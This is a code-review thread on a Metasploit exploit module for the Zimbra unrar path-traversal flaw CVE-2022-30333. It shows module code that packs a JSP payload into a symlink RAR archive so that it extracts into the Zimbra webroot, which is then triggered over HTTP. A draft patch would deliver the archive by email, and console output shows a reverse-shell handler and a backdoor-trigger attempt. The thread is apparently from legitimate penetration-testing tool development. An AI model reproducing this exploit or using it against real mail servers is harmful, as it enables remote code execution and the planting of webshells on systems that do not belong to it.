modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb

```diff
@@ -0,0 +1,176 @@
+        'DefaultTarget' => 0,
+        'Privileged' => false,
+        'DisclosureDate' => '2022-06-28',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('FILENAME', [ false, 'The file name.', 'payload.rar']),
+
+        # Separating the path, filename, and extension allows us to randomize the filename
+        OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - "../../").']),
+        OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).']),
+      ]
+    )
+
+    register_advanced_options(
+      [
+        OptString.new('SYMLINK_FILENAME', [ false, 'The name of the symlink file to use (must be 12 characters or less; default: random)']),
+        OptBool.new('TRIGGER_PAYLOAD', [ false, 'If set, attempt to trigger the payload via an HTTP request.', true ]),
+
+        # Took this from multi/handler
+        OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions.', 0 ]),
+        OptInt.new('CheckInterval', [ true, 'The number of seconds to wait between each attempt to trigger the payload on the server.', 5 ])
+      ]
+    )
+  end
+
+  # Generate an on-system filename using datastore options
+  def generate_target_filename
+    if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp')
+      print_Warning('TARGET_FILENAME does not end with .jsp, was that intentional?')
+    end
+
+    File.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || "#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp")
+  end
+
+  # Normalize the path traversal and figure out where it is relative to the web root
+  def zimbra_get_public_path(target_filename)
+    # Normalize the path
+    normalized_path = Pathname.new(File.join('/opt/zimbra/data/amavisd/tmp', target_filename)).cleanpath
+
+    # Figure out where it is, relative to the webroot
+    webroot = Pathname.new('/opt/zimbra/jetty_base/webapps/zimbra/')
+    relative_path = normalized_path.relative_path_from(webroot)
+
+    # Hopefully, we found a path from the webroot to the payload!
+    if relative_path.to_s.start_with?('../')
+      return nil
+    end
+
+    relative_path
+  end
+
+  def exploit
+    print_status('Encoding the payload as a .jsp file')
+    payload = Msf::Util::EXE.to_jsp(generate_payload_exe)
+
+    # Create a file
+    target_filename = generate_target_filename
+    print_status("Target filename: #{target_filename}")
+    rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..12), target_filename, payload)
+    if rar.nil?
+      fail_with(Failure::BadConfig, 'Failed to encode RAR file')
+    end
+
+    file_create(rar)
```

Comment:
What are your thoughts on delivering this ourselves instead of just creating the file?

Reply:
So I'm trying to do this, but it seems that the SMTPDeliver mixin and the HTTPClient mixin don't play well. They both want RPORT and SSL settings, which is annoying but fixable. But also, if they're both imported, something (maybe the `connect()` method?) starts blowing things up. This wouldn't be ready to go yet, but I'm experimenting with this patch:

```
diff --git a/modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb b/modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb
index debed0e1c1..1421d8556b 100644
--- a/modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb
+++ b/modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb
@@ -11,6 +11,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::FileDropper
   include Msf::Exploit::Format::RarSymlinkPathTraversal
+  include Msf::Exploit::Remote::SMTPDeliver
 
   def initialize(info = {})
     super(
@@ -61,8 +62,10 @@ class MetasploitModule < Msf::Exploit::Remote
           'TARGET_PATH' => '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/',
           'TARGET_FILENAME' => nil,
           'DisablePayloadHandler' => false,
-          'RPORT' => 443,
-          'SSL' => true
+          'RPORT' => 465,
+          'SSL' => true,
+          'HTTP_PORT' => 443,
+          'HTTP_SLS' => true
         },
         'DefaultTarget' => 0,
         'Privileged' => false,
@@ -77,11 +80,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('FILENAME', [ false, 'The file name.', 'payload.rar']),
+        OptString.new('FILENAME', [ false, 'The file name; should end with .rar (default: <random>.rar).']),
 
         # Separating the path, filename, and extension allows us to randomize the filename
         OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - "../../").']),
         OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).']),
+
+        OptString.new('HTTP_PORT', [ true, 'The HTTP port that we use to trigger the payload.', 443]),
+        OptBool.new('HTTP_SSL', [ true, 'Use SSL when connecting to the HTTP port?', true]),
       ]
     )
 
@@ -135,9 +141,38 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::BadConfig, 'Failed to encode RAR file')
     end
 
-    file_create(rar)
 
-    print_good('File created! Email the file above to any user on the target Zimbra server')
+    ### EMail it!
+
+
+    name = datastore['FILENAME'] || Rex::Text.rand_text_alpha(rand(4..10)) + ".rar"
+
+    if !name.end_with?('.rar')
+      print_warning("Warning: FILENAME does not end with .rar, is that intentional?")
+    end
+
+    # TODO: Do I need / want to fill these in?
+    data = 'hi'
+
+    msg = Rex::MIME::Message.new
+    msg.mime_defaults
+    msg.subject = datastore['SUBJECT'] || 'test'
+    # msg.to = datastore['MAILTO']
+    # msg.from = datastore['MAILFROM']
+    msg.to = 'ron@zimbra.example.org'
+    msg.from = 'test@test.com'
+
+    msg.add_part(Rex::Text.encode_base64(data, "\r\n"), "text/plain", "base64", "inline")
+    msg.add_part_attachment(rar, name)
+    send_message(msg.to_s)
+
+    print_status("Waiting for a payload session (backgrounding)...")
+
+    ####
+    #file_create(rar)
+    ####
+
+    # print_good('File created! Email the file above to any user on the target Zimbra server')
 
     # Bail if they don't want the payload triggered
     return unless datastore['TRIGGER_PAYLOAD']
@@ -163,7 +198,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
       res = send_request_cgi(
         'method' => 'GET',
-        'uri' => normalize_uri(public_filename)
+        'uri' => normalize_uri(public_filename),
+        'rport' => datastore['HTTP_PORT'],
+        'ssl' => datastore['HTTP_SSL'],
       )
 
       unless res
```

But it causes this error:

```
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > show options

Module options (exploit/linux/http/zimbra_unrar_cve_2022_30333):

   Name             Current Setting                                                   Required  Description
   ----             ---------------                                                   --------  -----------
   DATE                                                                               no        Override the DATE: field with this value
   DOMAIN           WORKSTATION                                                       no        SMTP Domain to EHLO to
   FILENAME         payload.rar                                                       no        The file name; should end with .rar (default: <random>.rar).
   HTTP_PORT        443                                                               yes       The HTTP port that we use to trigger the payload.
   HTTP_SSL         true                                                              yes       Use SSL when connecting to the HTTP port?
   MAILFROM         random@example.com                                                yes       The FROM address of the e-mail
   MAILTO           ron@zimbra.example.org                                            yes       The TO address of the email
   PASSWORD                                                                           no        SMTP Password for sending email
   RHOST            10.0.0.154                                                        yes       The SMTP server to send through
   RHOSTS           10.0.0.154                                                        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT            465                                                               yes       The SMTP server port (e.g. 25, 465, 587, 2525) (TCP)
   SUBJECT          hi                                                                yes       Subject line of the email
   TARGET_FILENAME                                                                    no        The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).
   TARGET_PATH      ../../../../../../../../../../../../opt/zimbra/jetty_base/webapp  yes       The location the payload should extract to (can, and should, contain path traversal characters - "../../").
                    s/zimbra/public/
   USERNAME                                                                           no        SMTP Username for sending email
   VERBOSE          false                                                             no        Display verbose information
   VHOST                                                                              no        HTTP server virtual host
[...]

msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > exploit

[*] Started reverse TCP handler on 10.0.0.146:4444 
[*] 10.0.0.154:465 - Encoding the payload as a .jsp file
[*] 10.0.0.154:465 - Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/wwlunimcyz.jsp
[-] 10.0.0.154:465 - Server refused to send to <ron@zimbra.example.org>
[*] 10.0.0.154:465 - Waiting for a payload session (backgrounding)...
[*] 10.0.0.154:465 - Trying to trigger the backdoor @ public/wwlunimcyz.jsp...
[-] 10.0.0.154:465 - Exploit failed: NoMethodError undefined method `request_cgi' for #<Socket:fd 9>
[-] 10.0.0.154:465 - Exploit failed: closed stream
[*] Exploit completed, but no session was created.
```

And the top of the call stack:

```
[07/29/2022 12:50:45] [e(0)] core: Exploit failed (linux/http/zimbra_unrar_cve_2022_30333): NoMethodError undefined method `request_cgi' for #<Socket:fd 9> - NoMethodError undefined method `request_cgi' for #<Socket:fd 9>
Call stack:
/home/ron/tools/metasploit-framework/lib/msf/core/exploit/remote/http_client.rb:370:in `send_request_raw'
/home/ron/tools/metasploit-framework/lib/msf/core/exploit/remote/http_client.rb:440:in `send_request_cgi'
/home/ron/tools/metasploit-framework/modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb:199:in `block in exploit'
/home/ron/tools/metasploit-framework/modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb:193:in `loop'
/home/ron/tools/metasploit-framework/modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb:193:in `exploit'
/home/ron/tools/metasploit-framework/lib/msf/core/exploit_driver.rb:228:in `job_run_proc'
/home/ron/tools/metasploit-framework/lib/msf/core/exploit_driver.rb:181:in `run'
```

If I remove the mixin and comment out the email, that makes HTTP work again but obviously without SMTP support. I'm getting super into the weeds trying to deal with it, really not sure that SMTP support is worth the trouble.

I'm getting really deep into the weeds with this, and even if I remove the HTTP part the SMTP seems to fail to send (I haven't tried to troubleshoot yet).

Reply:
I think using SMTP is too much effort for the value we'd get